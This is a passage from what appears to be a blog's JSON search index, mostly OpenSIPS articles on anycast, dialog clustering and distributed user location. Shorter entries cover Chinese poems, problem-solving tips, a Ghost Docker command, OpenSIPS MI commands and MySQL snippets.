\u0026#34;$ml\u0026#34;) # message length .","title":"深入OpenSIPS统计引擎"},{"content":"he advantages of doing Load Balancing and High Availability **without **any particular requirements from the clients side are starting to make Anycast IPs more and more appealing in the VoIP world. But are you actually using the best out of it? This article describes how you can use OpenSIPS 2.4 to make the best use of an anycast environment.Anycast is a UDP-based special network setup where a single IP is assigned to multiple nodes, each of them being able to actively use it (as opposed to a VRRP setup, where only one instance can use the IP). When a packet reaches the network with an anycast destination, the router sends it to the “closest” node, based on different metrics (application status, network latency, etc). This behavior ensures that traffic is (1) balanced by sending it to one of the least busy nodes (based on application status) and also ensures (2) geo-distribution, by sending the request to the closest node (based on latency). Moreover, if a node goes down, it will be completely put out of route, ensuring (3) high availability for your platform. All these features without any special requirements from your customers, all they need is to send traffic to the anycast IP.Sounds wonderful, right? It really is! And if you are running using anycast IPs in a transaction stateless mode, things just work out of the box.\nState of the art A common Anycast setup is to assign the anycast IPs to the nodes at the edge of your platform, facing the clients. This setup ensures that all three features (load balancing, geo-distribution and high-availability) are provided for your customers’ inbound calls. However, most of the anycast “stories” we have heard or read about are only using the anycast IP for the initial incoming INVITEs from customers. Once received, the entire call is pinned to a unicast IP of the first server that received the INVITE. Therefore all sequential messages will go through that single unicast IP. Although this works fine from SIP point of view, you will lose all the anycast advantages such as high-availability.When using this approach (of only receiving initial request on the anycast IP) the inbound calls to the clients will also be affected, because besides losing dialog high-availability, you will also need to ask all your clients to accept calls from all your available unicast IPs. Imagine what happens when you add a new node.Our full anycast solution aims to sort out these limitations by always keeping the anycast IPs in the route for the entire call. This means that your clients will always have one single IP to provision, the anycast IP. And when a node goes down, all sequential messages will be re-routed (by the router) to the next available node. Of course, this node needs to have the entire call information to be able to properly close the call, but that can be easily done in OpenSIPS using dialog replication.Besides the previous issue, most of the time running in stateless mode is not possible due to application logic constraints (re-transmission handling, upstream timeout detection, etc.). Thus stateful transaction mode is required, which complicates a bit more our anycast scenario.\nAnycast in a transaction stateful scenario A SIP transaction consists of a request and all the replies associated to that request. According to the SIP RFC, when a stateful SIP proxy sends a request, the next hop should immediately send a reply as soon as it received the request. Otherwise, the SIP proxy will start re-transmitting that request until it either receives a reply, or will eventually time out. Now, let’s consider the anycast scenario described in Figure 1: Figure 1.OpenSIPS instance 1 sends an INVITE to the client, originated from the Anycast IP interface. The INVITE goes through the Router, and reaches the Client’s IP. However, when the Client replies with 200 OK, the Router decides the “shortest” path is to OpenSIPS instance 2, which has no information about the transaction. Therefore, instance 2 drops all the replies. Moreover, since instance 1 did not receive any reply, it will start re-transmitting the INVITE. And so on, and so forth, until instance 1 times out, because it did not receive any reply, and the Client times out because there was no ACK received for its replies. Therefore the call is unable to complete.To overcome this behavior, we have developed a new mechanism that is able to handle transactions in such distributed environments. The following section describes how this is done.\nDistributed transactions handling Transactions are probably the most complicated structures in SIP, especially because they are very dynamic (requests and replies are exchanged within milliseconds) and they contain a lot of data (various information from the SIP messages, requests for re-transmissions, received replies, multiple branches, etc). That makes them very hard to move around between different instances. Therefore, instead of sending transaction information to each node within the anycast “cluster”, our approach was to bring the events to the node that created the transaction. This way we minimize the amount of data exchanged between instances – instead of sending huge transaction data, we simply replicate one single message – and we are only doing this when it’s really necessary – we are only replicating messages when the router that manages the anycast config switches to a different node.When doing distributed transaction handling, the logic of the transaction module is the following: when a reply comes on one server, we check whether the current node has a transaction for that reply. If it does (i.e. the router did not switch the path), the reply is processed locally. If it does not, then somebody else must “own” that transaction. The question is who? That’s where the SIP magic comes: when we generate the INVITE request towards the client, we add a special parameter in the VIA header, indicating the ID of the node that created the transaction. When the reply comes back, that ID contains exactly the node that “owns” the transaction. Therefore, all we have to do is to take that ID and forward the message to it, using the proto_bin module. When the “owner” receives the reply, it “sees” it exactly as it would have received it directly from the client, thus treating it exactly as any other regular reply. And the call is properly established further. Figure 2.There is one more scenario that needs to be taken into account, namely what happens when a CANCEL message reaches a different node (Figure 2). Since there is no transaction found on node 2, normally that message would have been declined. However, in an anycast environment, the transaction might be “owned” by a different node. , therefore, we need to instruct him that the transaction was canceled. However, this time we have no information about who “owns” that transaction – so all we can do is to broadcast the CANCEL event to all the nodes within the cluster. If any of the nodes that receive the event find the transaction that the CANCEL refers to, it will properly reply a 200 OK message and then close all the ongoing branches. If no transaction is found on any node, the CANCEL will eventually time out on the Client side.A similar approach is done for a hop-by-hop ACK message received in an anycast interface.\nAnycast Configuration The first thing we have to do is to configure the anycast address on each node that uses it. This is done in the listen parameter:\nlisten = udp:10.10.10.10:5060 anycast The distributed transaction handling feature relies on the clusterer module to group the nodes that use the same anycast address in a cluster. The resulting cluster id has to be provisioned using the tm_replication_cluster parameter of the transaction module:\nloadmodule \u0026#34;tm.so\u0026#34; modparam(\u0026#34;tm\u0026#34;, \u0026#34;tm_replication_cluster\u0026#34;, 1) The last thing that we need to take care of is the hop-by-hop messages, such as ACK. This is automatically done by using the t_anycast_replicate() function: if (!loose_route()) { if (is_method(\u0026#34;ACK\u0026#34;) \u0026amp;\u0026amp; !t_check_trans()) { # transanction not here - replicate msg to other nodes t_anycast_replicate(); exit; } } Notice that the CANCEL is not treated in the snippet above. That is because CANCEL messages received on an anycast interface are automatically handled by the transaction layer as described in the previous section. However, if one intends to explicitly receive the CANCEL message in the script to make any adjustments (i.e. change the message Reason), they can disable the default behavior using the cluster_auto_cancel param. However, this changes the previous logic a bit, since the CANCEL must be replicated as well in case no transaction is locally found:\nmodparam(\u0026#34;tm\u0026#34;, \u0026#34;cluster_auto_cancel\u0026#34;, no) ... if (!loose_route()) { if (!t_check_trans()) { if (is_method(\u0026#34;CANCEL\u0026#34;)) { # do your adjustments here t_anycast_replicate(); exit; } else if is_method(\u0026#34;ACK\u0026#34;) { t_anycast_replicate(); exit; } } } And that’s it – you have a fully working anycast environment, with distributed transaction matching!\nFind out more! The distributed transaction handling mechanism has already been released on the OpenSIPS 2.4 development branch. To find out more about the design and internals of this feature, as well as other use cases, make sure you do not miss the Full Anycast support at the edge of your platform using OpenSIPS 2.4 presentation about this at the Amsterdam 2018 OpenSIPS Summit, May 1-4!\n","permalink":"https://wdd.js.org/opensips/blog/full-anycast/","summary":"he advantages of doing Load Balancing and High Availability **without **any particular requirements from the clients side are starting to make Anycast IPs more and more appealing in the VoIP world. But are you actually using the best out of it? This article describes how you can use OpenSIPS 2.4 to make the best use of an anycast environment.Anycast is a UDP-based special network setup where a single IP is assigned to multiple nodes, each of them being able to actively use it (as opposed to a VRRP setup, where only one instance can use the IP).","title":"Full Anycast support in OpenSIPS 2.4"},{"content":"Dialog replication in OpenSIPS has been around since version 1.10, when it became clear that sharing real-time data through a database is no longer feasible in a large VoIP platform. Further steps in this direction have been made in 2.2, with the advent of the clusterer module, which manages OpenSIPS instances and their inter-communication. But have we been able to achieve the objective of a true and complete solution for clustering dialog support? In this article we are going to look into the limitations of distributing ongoing calls in previous OpenSIPS versions and how we overcame them and added new possibilities in 2.4, based on the improved clustering engine.\nPrevious Limitations Up until this point, distributing ongoing dialogs essentially only consisted in sharing the relevant internal information with all other OpenSIPS instances in the cluster. To optimize the communication, whenever a new dialog is created (and confirmed) or on existing one is updated (state changes etc.), a binary message about that particular dialog is broadcasted.Limiting the data exchange to be driven by runtime events leaves an instance with no way of learning all the dialog information from the cluster when it boots up or at a particular moment in time. Consider what happens when we restart a backup OpenSIPS: any failover that we hope to be able to handle on that node will have to be delayed until it gets naturally in sync with the other node(s).But the more painful repercussion of just sharing data without any other distributed logic is the lack of a mechanism to coordinate certain data-related actions between the cluster nodes. For example, in a typical High-Availability setup with an active-passive nodes configuration, although all dialogs are duplicated to the passive node, the following must be performed exactly once:\ngenerate **BYE requests **and/or produce CDRs (Call Detail Records) upon dialog expiration; send Re-Invite or OPTIONS pings to end-points; send replication packets on dialog events; update the dialog database (if it is still used as a failsafe for binary replication, e.g. both nodes crash). Usage scenarios Before actually diving into how OpenSIPS 2.4 solves the before mentioned issues, let’s first see the most popular scenarios we considered when designing the dialog clustering support:\nActive – Backup setup for High Availability using Virtual IPs**.** The idea here would be to have a Virtual IP (or floating IP) facing the end-users. This IP will be automatically moved from a failed instance to a hot-backup server by tools like vrrpd, KeepaliveD, Heartbeat. Active – Active setup, or a double cross Active-Backup. This is a more “creative” approach using two Virtual IPs, each server being active for one of them and backup for the other, and still sharing all the dialogs, in order to handle both VIPs when a server fails. Anycast setup for Distributed calls (High Availability and Balancing). This relies on the newly add full support for Anycast** **introduced in OpenSIPS 2.4. You can find more details in the dedicated article. Dialog Clustering with OpenSIPS 2.4 The new dialog clustering support in OpenSIPS 2.4 is addressing all the mentioned limitations by properly and fully addressing the typical clustering scenarios. But first let’s see which are the newly introduced concepts in OpenSIPS 2.4 when it comes to clustering dialogs.\nData synchronization In order to address our first discussed issue, the improved clustering under-layer in OpenSIPS 2.4 offers the capability of synchronizing a freshly booted node with the complete data set from the cluster in a fast and transparent manner. This way, we can minimize the impact of restarting an OpenSIPS instance, or plugging a new node in the cluster on the fly, without needing any DB storage or having to accept the compromise of lost dialogs. We can also perform a sync at any time via an MI command, if for some reason the dialog data got desynchronized on a given instance.\nDialog ownership mechanism The other big improvement that OpenSIPS 2.4 introduces for distributing dialogs is the capability to precisely decide which node in the cluster is responsible for a dialog – responsible in the way of triggering certain actions for that dialog. This comes as a necessity because some of the dialogs are locally created on an instance, some are temporarily handled in place of a failed/inactive node and others are just kept as backup. As such, the concept of dialog “ownership” was introduced.The basic idea of this mechanism is that a single node in the dialog cluster (where all the calls are shared) is “responsible” at any time of a given dialog, in terms of taking actions for it. When the node owning the dialog goes down, another node become its owner and handle its actions.But how is this ownership concept concretely implemented in OpenSIPS 2.4?\nSharing tags In order to be able to establish an ownership relationship between the nodes and the dialog, we introduced the concept of tags or _“sharing tags” _as we call them. Each dialog is marked with a single tag; on the other hand, a node is actively responsible for (owning) a tag (and indirectly all the dialogs marked with that tag). A tag may be present on several nodes, but only a single node sees the tag as active; the other nodes aware of that tag are seeing the tag in standby/backup mode.So each node may be aware of multiple sharing tags, each with an _active _or backup state. Each tag can be defined with an implicit state at OpenSIPS startup or directly set at runtime and all this information is shared between the cluster nodes. When we set a sharing tag to active on certain node, we are practically setting that node to become the owner of all its known dialogs that are marked with that particular tag. At the same time, if another node was active for tag, it has to step down.To better understand this, we will briefly describe how the sharing tags should be used in the previously mentioned scenarios, considering a simple two node cluster:\nin an active-backup cluster with a single VIP, we would only need a single sharing tag corresponding the VIP address; the node that holds the VIP will also have the VIP set to active and perform all the dialog related actions; in an active-active cluster with two VIPs, we would need two sharing tags, corresponding to each VIP, and whichever node holds the given VIP, should have the appropriate tag set as active; in an anycast cluster setup, we will have one sharing tag corresponding to each node (because the dialog is tied to the node it was first created as opposed to an IP). If a node is up, it should have its corresponding tag active, otherwise any node can take the tag over. Configuration Setting up dialog replication in OpenSIPS 2.4 is very easy and, in the following, we will exemplify our discussed scenarios with the essential configuration:\n1. Active-backup setup Let’s use the tag named “vip” which will be configured via the dlg_sharing_tag module parameter. When starting OpenSIPS, you need to check the HA status of the node (by inspecting the HA system) and to decide which node will start as owner of the tag:modparam(\u0026ldquo;dialog\u0026rdquo;, \u0026ldquo;dlg_sharing_tag\u0026rdquo;, \u0026ldquo;vip=active\u0026rdquo;)if active or :modparam(\u0026ldquo;dialog\u0026rdquo;, \u0026ldquo;dlg_sharing_tag\u0026rdquo;, \u0026ldquo;vip=backup\u0026rdquo;)if standby.During runtime, depending on the change of the HA system, the tag may be moved (as active) to a different node by using MI commands (see following chapter).At script level, all we need to do, on each node, is to mark a newly created dialog with the sharing tag, using the set_dlg_sharing_tag() function:if (is_method(\u0026ldquo;INVITE\u0026rdquo;)) { create_dialog(); set_dlg_sharing_tag(\u0026ldquo;vip\u0026rdquo;);}\n2. Active-active setup Similar with the previous case, but we will use two tags, one for each VIP address. We will define the initial tag state for the first VIP, on the first node:modparam(\u0026ldquo;dialog\u0026rdquo;, \u0026ldquo;dlg_sharing_tag\u0026rdquo;, \u0026ldquo;vip1=active\u0026rdquo;)The second node will initially be responsible for the second VIP, so on node id 2 we will set:modparam(\u0026ldquo;dialog\u0026rdquo;, \u0026ldquo;dlg_sharing_tag\u0026rdquo;, \u0026ldquo;vip2=active\u0026rdquo;)Now, on each node, depending on which VIP do we receive the initial Invite, we mark the dialog appropriately:if (is_method(\u0026ldquo;INVITE\u0026rdquo;)) { create_dialog(); if ($Ri == 10.0.0.1 # VIP 1) set_dlg_sharing_tag(\u0026ldquo;vip1\u0026rdquo;); else if ($Ri == 10.0.0.2 # VIP 2) set_dlg_sharing_tag(\u0026ldquo;vip2\u0026rdquo;);}So, calls established via the VIP1 address will be marked with the “vip1” tag and handled by the node having the “vip1” tag as active – this will be the node 1 in normal operation.The calls established via the VIP2 address will be marked with the “vip2” tag and handled by the node having the “vip2” tag as active – this will be the node 2 in normal operation.If the node 1 fails, the HA system will move the VIP1 as active on node 2. Further, the HA system is responsible to instruct OpenSIPS running on node 2 that it become the owner of tag “vip1” also, so node 2 will start to actively handle the calls marked with “vip1” also.\n3. Anycast setup Each node has its own corresponding tag and it starts with the tag as active. So on node 1 we will have:modparam(\u0026ldquo;dialog\u0026rdquo;, \u0026ldquo;dlg_sharing_tag\u0026rdquo;, \u0026ldquo;node_1=active\u0026rdquo;)And on the second node, the same as above, but with “node_2=active”.Now, each node marks the dialogs with its own tag, for example on node 1:if (is_method(\u0026ldquo;INVITE\u0026rdquo;)) { create_dialog(); set_dlg_sharing_tag(\u0026ldquo;node_1\u0026rdquo;);}And, conversely, node 2 marks each created dialog with the “node_2” tag.If node 1 fails, the monitoring system (also responsible for the Anycast management and BGP updates) will pick one of the remaining node in the anycast group and it will activate the “node_1” tag on it. So, this new node will became owner and responsible for the calls created on former node 1.\nChanging sharing tags state All that remains to be discussed is how can we take over the ownership of the dialogs flagged with a certain sharing tag at runtime. This is of course the case when our chosen mechanism of node availability detects that a node in the cluster is down, or when we do a manual switch-over (e.g. for maintenance). So for this purpose, all we have to do is to issue the MI command dlg_set_sharing_tag_active that sets a certain sharing tag to the active state. For example, in the single VIP scenario, with a sharing tag named “vip”, after we have re-pointed the floating IP to the current machine, we would run:opensipsctl fifo dlg_set_sharing_tag_active vip\nConclusions The new dialog clustering support in OpenSIPS 2.4 is a complete one as it not only takes care of dialog replication/sharing, but also of dialog handling in terms of properly triggering dialog-specific actions.The implementation also tries to provide a consistent solution, by following and addressing the most used scenarios in terms of dialog clustering – these are real world scenarios answering to real world needs.Even more, the work on the dialog clustering was consistently correlated with work on the Anycast support, so it will be an easy task for the user to build an integrated anycast setup taking care of both transaction and dialog layers.Need more practical examples ? Join us to the OpenSIPS Summit 2018 in Amsterdam and see the Interactive Demos about the clustering support in OpenSIPS 2.4\n","permalink":"https://wdd.js.org/opensips/blog/cluster-call/","summary":"Dialog replication in OpenSIPS has been around since version 1.10, when it became clear that sharing real-time data through a database is no longer feasible in a large VoIP platform. Further steps in this direction have been made in 2.2, with the advent of the clusterer module, which manages OpenSIPS instances and their inter-communication. But have we been able to achieve the objective of a true and complete solution for clustering dialog support?","title":"Clustering ongoing calls with OpenSIPS 2.4"},{"content":"The distributed SIP user location support is one of the major features of the latest stable OpenSIPS release, namely 2.4. The aim of this extension of the OpenSIPS usrloc module is to provide a horizontally scalable solution that is easy to set up and maintain, while remaining flexible enough to cope with varying needs of each specific deployment.Throughout this text, by “data” we refer to SIP Addresses-of-Record (subscribers) and their dynamic SIP Contact bindings (network coordinates of their SIP devices) — all of these must be replicated across cluster nodes. From a data sharing point of view, we can break the distributed user location support down in two major modes of usage:\n“federation”, where each node holds a portion of the overall dataset. You can read everything about this data sharing strategy in this tutorial. “full sharing”, where all cluster nodes are homogeneous and interchangeable. In this article, we’re going to zoom in on the “full sharing” support, which is actually further broken down into two submodes of usage, depending on the size of your deployment: one where the dataset fits into OpenSIPS memory, and the other one where it is fully managed by a specialized NoSQL database.\nNative “Full Sharing” With native (OpenSIPS-only) data sharing, we make use of the clustering layer in order to replicate SIP AoRs and Contacts between nodes at runtime, as well as during the startup synchronization phase. An example setup would look like the following:\nNative “Full Sharing” ArchitectureNotice how the OpenSIPS cluster is front-ended by an additional SIP entity: a Session Border Controller. This is an essential requirement of this topology (and a common gotcha!). The idea is that the nodes, along with the way they use the data must be identical. This allows, for example, the ability to ramp up/down the number of instances when the platform is running at peak hour or is sitting idle.Let’s take a look at some common platform management concerns and see how they are dealt with using the native “full sharing” topology.\nDealing with Node Failures Node failures in “full sharing” topologies are handled smoothly. Thanks to the SBC front-end that alleviates all IP restrictions, the service can withstand downtime from one or more cluster nodes without actually impacting the clients at all.\nSuccessfully completing a call through Node 2 after Node 1 goes offlineIn this diagram, cluster Node 1 goes offline due to a hardware failure. After the SIP INVITE transaction towards Node 1 times out, the SBC fails over to Node 2, successfully completing the call.\nRestart Persistency By having restart persistency, we ensure that we are able to restart a node without losing the cached dataset. The are two ways of achieving this, depending on whether you intend to use an SQL database or not.\nCluster Sync The clustering layer can also act as an initialization tool, allowing a newly booted “joiner” node to discover a consistent “donor” node from which to request a full data sync.\nSQL-based Users who prefer a more sturdy, disk-driven way of persisting data can easily configure an SQL database URL to which an OpenSIPS node will periodically flush its cached user location dataset.Recommendation: if you plan on using this feature, we recommend deploying a local database server on each node. Setting up multiple nodes to flush to a shared database using the old skip_replicated_db_ops feature may still work, but we no longer encourage or test such setups.\nContact Pinging Thanks to the clustering layer that makes nodes aware of the total number of online nodes, we are able to evenly spread the pinging workload across the current number of online cluster nodes at any given point in time.Configuration: You only have to configure the pinging-related module parameters of nathelper(e.g. sipping_bflag, sipping_from, natping_tcp, natping_interval) and set these flags for the contacts which require pinging. Nothing new, in short. The newly added pinging workload distribution logic will work right out of the box.\n“Full Sharing” via NoSQL NoSQL-based “Full Sharing”For deployments that are so large that the dataset outgrows the size of the OpenSIPS cache, or in case you simply don’t feel at ease with Gigabytes worth of cached SIP contacts in production, NoSQL may be a more pleasant alternative.With features such as data replication, data sharding and indexed columns, it may be a wise choice to leave the handling of large amounts of data to a specialized engine rather than doing it in-house. Configuring such setups will be a topic for an in-depth future tutorial, where we will learn how to configure “full sharing” user location clusters with both of the currently supported NoSQL engines: Apache Cassandra and MongoDB.\nSummary The “full sharing” data distribution strategy for the OpenSIPS user location is an intuitive solution which requires little to no additional OpenSIPS scripting (only a handful of module parameters). The major hurdles of running a SIP deployment (data redundancy, node failover, restart persistency and NAT traversal) have been carefully solved and baked into the module, without imposing any special script handling to the user. Moreover, depending on the sizing requirements of the target platform, users retain the flexibility of choosing between the native or NoSQL-based data management engines.\n","permalink":"https://wdd.js.org/opensips/blog/cluster-location/","summary":"The distributed SIP user location support is one of the major features of the latest stable OpenSIPS release, namely 2.4. The aim of this extension of the OpenSIPS usrloc module is to provide a horizontally scalable solution that is easy to set up and maintain, while remaining flexible enough to cope with varying needs of each specific deployment.Throughout this text, by “data” we refer to SIP Addresses-of-Record (subscribers) and their dynamic SIP Contact bindings (network coordinates of their SIP devices) — all of these must be replicated across cluster nodes.","title":"Clustered SIP User Location: The Full Sharing Topology"},{"content":"You already know the story – one more year, one more evolution cycle, one more OpenSIPS major release. Even more, a new OpenSIPS direction is about to start. So let me introduce you to the upcoming OpenSIPS 3.0 .For the upcoming OpenSIPS 3.0 release (and 3.x family) the main focus is on the **_devops _**concept. Shortly said, this translates into:\nmaking the OpenSIPS script writing/developing much easier simplifying the operational activities around OpenSIPS What features and functionalities a software is able to deliver is a very important factor. Nevertheless, how easy to use and operate the software is, it;s a another factor with almost the same importance . Especially if we consider the case of OpenSIPS which is a very complex software to configure, to integrate and to operate in large scale multi-party platforms.\nThe “dev” aspects in OpenSIPS 3.0 This release is looking to improve the experience of the OpenSIPS script writer (developer), by enhancing and simplifying the OpenSIPS script, at all its level.The script re-formatting (as structure), the addition of full pre-processor support, the enhancement of the script variable’s naming and support, the standardization of the complex modparams (and many other) will address the script writers needs of\neasiness flexibility strength when comes to creating, managing and maintaining more and more complex OpenSIPS configurations.The full list of “dev” oriented features along with explanations and details is to be found on the official 3.0 planning document.\nThe “ops” aspects in OpenSIPS 3.0 The operational activity is a continues job, starting from day one, when you started to run your OpenSIPS. Usually there is a lot of time, effort and resources invested in this operational activities, so any extra help in the area is more than welcome.OpenSIPS 3.0 is planning several enhancements and new concepts in order to help with operating OpenSIPS – making it simpler to run, to monitor, to troubleshoot and diagnose.We are especially looking at reducing the need of restarts during service time – restarting your production OpenSIPS is something that any devops engineer will try to avoid as much as possible. New features as auto-scaling (as number of processes), runtime changes of module parameters or script reload are addressing this fear. Even when a restart cannot be avoided, the internal memory persistence during restart may minimize the impact.But when comes to vital operational activities like monitoring and understanding what is going one with your OpenSIPS or troubleshooting calls or traffic handled by your OpenSIPS, the most important new additions for helping to operate OpenSIPS are:\ntracing console – provided by the new ‘opensipsctl’ tool, the console will allow you to see in realtime various information related to specifics call only. The information may be the OpenSIPS logs, SIP packets, script logs, rest queries, maybe DB queries self diagnosis tool – also provided by the opensipsctl tool, this is a logic that collects various information from a running OpenSIPS (via MI) in regards to thresholds, load information, statistics and logs in order to locate and indicate a potential problem or bottleneck with your OpenSIPS. There are even more features that will simply the way you operate your OpenSIPS – the full list (with explanations) is available on the official 3.0 planning document.\nMore Integration aspects withe OpenSIPS 3.0 The work to make possible the integration of OpenSIPS with other external components is a never-ending job. This release will make no exception and address this need.A major rework of the Management Interface is ongoing, with the sole purpose of standardizing and simplifying the way you interact with the MI interface. Shifting to Json encoding as the only way to pack data and re-structuring all the available transport (protocols) for interacting with the MI interface will enhance your experience in using this interface from any other language / application.The 3.0 release is planning to provide new modules for more integration capabilities:\n**SMPP **module – a bidirectional gateway / translator between SIP (MESSAGE requests) and SMPP protocol. RabbitMQ consumer module – a RabbitMQ consumer that pushes the messages as events into the OpenSIPS script. A more detailed description is available on the official 3.0 planning document.\nCommunity opinion is important The opinion of the community matters to us, so we need your feedback and comments in regards to the 3.0 Dev Plan.To express yourself on the 3.0 Dev Plan, please see the online form — you can give scores to the items in the plan and you can suggest other items. This feedback will be very useful for us in order to align the Dev Plan to the real needs of our community, of the people actually using OpenSIPS. Besides our ideas listed in the form, you can of course come with your own ideas, or feature requests that we will gladly take into considerations.The deadline for submitting your answers in the form is 6th of January 2019. After this deadline we will gather all your submissions and sort them according to your feedback. We will use the result to filter the topics you consider interesting and prioritize the most wanted ones.Also, to talk more in details about the features of this new release, a public audio conferencewill be available on 20th of December 2018, 4 pm GMT , thanks to the kind sponsorship of UberConference. Anyone is welcome to join to find out more details or to ask questions about OpenSIPS 3.0.This is a public and open conference, so no registration is needed.\nThe timeline The timeline for OpenSIPS 3.0 is:\nBeta Release – 18-31 March 2019 Stable Release – 22-29 April 2019 General Availability – 30th of April 2019, during OpenSIPS Summit 2019 ","permalink":"https://wdd.js.org/opensips/blog/opensips3x/","summary":"You already know the story – one more year, one more evolution cycle, one more OpenSIPS major release. Even more, a new OpenSIPS direction is about to start. So let me introduce you to the upcoming OpenSIPS 3.0 .For the upcoming OpenSIPS 3.0 release (and 3.x family) the main focus is on the **_devops _**concept. Shortly said, this translates into:\nmaking the OpenSIPS script writing/developing much easier simplifying the operational activities around OpenSIPS What features and functionalities a software is able to deliver is a very important factor.","title":"Introducing OpenSIPS 3.0"},{"content":"问题分为两种,一种是搜索引擎能够找到答案的,另一种是搜索引擎找不到答案的。\n按照80-20原则,前者估计能占到80%,而后者能占到20%。\n1 搜索引擎的使用 1.1 如何让搜索引擎更加理解你? 如果你能理解搜索引擎,那么搜索引擎会更加理解你。\n搜索引擎是基于关键词去搜索的,所以尽量给搜索引擎关键词,而不是大段的报错 关键词的顺序很重要,把重要的关键词放在靠前的位置 1.2 如何提炼关键词? 1.3 不错的所搜引擎推荐? 2 当搜索引擎无法解决时? 当搜索引擎无法解决时,可以从哪些方面思考?\n拼写或者格式等错误 上下文不理解,语境不清晰,断章取义 ","permalink":"https://wdd.js.org/posts/2019/07/bq7ih4/","summary":"问题分为两种,一种是搜索引擎能够找到答案的,另一种是搜索引擎找不到答案的。\n按照80-20原则,前者估计能占到80%,而后者能占到20%。\n1 搜索引擎的使用 1.1 如何让搜索引擎更加理解你? 如果你能理解搜索引擎,那么搜索引擎会更加理解你。\n搜索引擎是基于关键词去搜索的,所以尽量给搜索引擎关键词,而不是大段的报错 关键词的顺序很重要,把重要的关键词放在靠前的位置 1.2 如何提炼关键词? 1.3 不错的所搜引擎推荐? 2 当搜索引擎无法解决时? 当搜索引擎无法解决时,可以从哪些方面思考?\n拼写或者格式等错误 上下文不理解,语境不清晰,断章取义 ","title":"解决问题的思维模式"},{"content":"梦与诗 胡适 醉过才知酒浓爱过才知情重你不能做我的诗正如我不能做你的梦\n情歌 刘半农天上飘着些微云地上吹着些微风啊!微风吹动了我的头发教我如何不想她?\n沙扬娜拉 赠日本女郎 徐志摩最是那一低头的温柔像一朵水莲花不胜凉风的娇羞道一声珍重道一声珍重那一声珍重里有蜜甜的忧愁沙扬娜拉!\n再别康桥 徐志摩轻轻地我走了正如我轻轻地来我轻轻地招手作别西天的云彩\n伊眼底 汪静之伊眼底是温暖的太阳不然,何以伊一望着我我受了冻的心就热了呢\n","permalink":"https://wdd.js.org/posts/2019/07/icwy4b/","summary":"梦与诗 胡适 醉过才知酒浓爱过才知情重你不能做我的诗正如我不能做你的梦\n情歌 刘半农天上飘着些微云地上吹着些微风啊!微风吹动了我的头发教我如何不想她?\n沙扬娜拉 赠日本女郎 徐志摩最是那一低头的温柔像一朵水莲花不胜凉风的娇羞道一声珍重道一声珍重那一声珍重里有蜜甜的忧愁沙扬娜拉!\n再别康桥 徐志摩轻轻地我走了正如我轻轻地来我轻轻地招手作别西天的云彩\n伊眼底 汪静之伊眼底是温暖的太阳不然,何以伊一望着我我受了冻的心就热了呢","title":"现代诗 五首 摘抄"},{"content":"Docker ghost 安装 docker run -d --name myghost -p 8090:2368 -e url=http://172.16.200.228:8090/ \\ -v /root/volumes/ghost:/var/lib/ghost/content ghost 模板修改 参考 https://www.ghostforbeginners.com/move-featured-posts-to-the-top-of-your-blog/ ","permalink":"https://wdd.js.org/posts/2019/07/ae4atc/","summary":"Docker ghost 安装 docker run -d --name myghost -p 8090:2368 -e url=http://172.16.200.228:8090/ \\ -v /root/volumes/ghost:/var/lib/ghost/content ghost 模板修改 参考 https://www.ghostforbeginners.com/move-featured-posts-to-the-top-of-your-blog/ ","title":"ghost博客 固定feature博客"},{"content":"在所有的fifo命令中,which命令比较重要,因为它可以列出所有的其他命令。\n有些mi命令是存在于各个模块之中,所以加载的模块不通。opensipsctl fifo which输出的命令也不通。\n获取执行参数 opensipsctl fifo arg 列出TCP连接数量 opensipsctl fifo list_tcp_conns 查看进程信息 opensipsctl fifo ps 查看opensips运行时长 opensipsctl fifo uptime 查看所有支持的指令 opensipsctl fifo which 获取统计数据 opensipsctl fifo get_statistics rcv_requests 重置统计数据 opensipsctl fifo get_statistics received_replies get_statistics reset_statistics uptime version pwd arg which ps kill debug cache_store cache_fetch cache_remove event_subscribe events_list subscribers_list list_tcp_conns help list_blacklists regex_reload t_uac_dlg t_uac_cancel t_hash t_reply ul_rm ul_rm_contact ul_dump ul_flush ul_add ul_show_contact ul_sync domain_reload domain_dump dlg_list dlg_list_ctx dlg_end_dlg dlg_db_sync dlg_restore_db profile_get_size profile_list_dlgs profile_get_values list_all_profiles nh_enable_ping cr_reload_routes cr_dump_routes cr_replace_host cr_deactivate_host cr_activate_host cr_add_host cr_delete_host dp_reload dp_translate address_reload address_dump subnet_dump allow_uri dr_reload dr_gw_status dr_carrier_status lb_reload lb_resize lb_list lb_status httpd_list_root_path sip_trace rtpengine_enable rtpengine_show rtpengine_reload teardown ","permalink":"https://wdd.js.org/opensips/ch3/core-mi/","summary":"在所有的fifo命令中,which命令比较重要,因为它可以列出所有的其他命令。\n有些mi命令是存在于各个模块之中,所以加载的模块不通。opensipsctl fifo which输出的命令也不通。\n获取执行参数 opensipsctl fifo arg 列出TCP连接数量 opensipsctl fifo list_tcp_conns 查看进程信息 opensipsctl fifo ps 查看opensips运行时长 opensipsctl fifo uptime 查看所有支持的指令 opensipsctl fifo which 获取统计数据 opensipsctl fifo get_statistics rcv_requests 重置统计数据 opensipsctl fifo get_statistics received_replies get_statistics reset_statistics uptime version pwd arg which ps kill debug cache_store cache_fetch cache_remove event_subscribe events_list subscribers_list list_tcp_conns help list_blacklists regex_reload t_uac_dlg t_uac_cancel t_hash t_reply ul_rm ul_rm_contact ul_dump ul_flush ul_add ul_show_contact ul_sync domain_reload domain_dump dlg_list dlg_list_ctx dlg_end_dlg dlg_db_sync dlg_restore_db profile_get_size profile_list_dlgs profile_get_values list_all_profiles nh_enable_ping cr_reload_routes cr_dump_routes cr_replace_host cr_deactivate_host cr_activate_host cr_add_host cr_delete_host dp_reload dp_translate address_reload address_dump subnet_dump allow_uri dr_reload dr_gw_status dr_carrier_status lb_reload lb_resize lb_list lb_status httpd_list_root_path sip_trace rtpengine_enable rtpengine_show rtpengine_reload teardown ","title":"核心MI命令"},{"content":"表复制 # 不跨数据库 insert into subscriber_copy(id, username) select id, username from subscriber # 跨数据库 需要在表名前加上数据库名 insert into wdd.test(id, username) select id, username from opensips.subscriber 调整表结构 增加字段 ALTER TABLE test ADD `username` char(64) not null default \u0026#39;\u0026#39; 随机选择一个数据 SELECT name FROM table_name order by rand() limit 1\n","permalink":"https://wdd.js.org/posts/2019/07/bk7r40/","summary":"表复制 # 不跨数据库 insert into subscriber_copy(id, username) select id, username from subscriber # 跨数据库 需要在表名前加上数据库名 insert into wdd.test(id, username) select id, username from opensips.subscriber 调整表结构 增加字段 ALTER TABLE test ADD `username` char(64) not null default \u0026#39;\u0026#39; 随机选择一个数据 SELECT name FROM table_name order by rand() limit 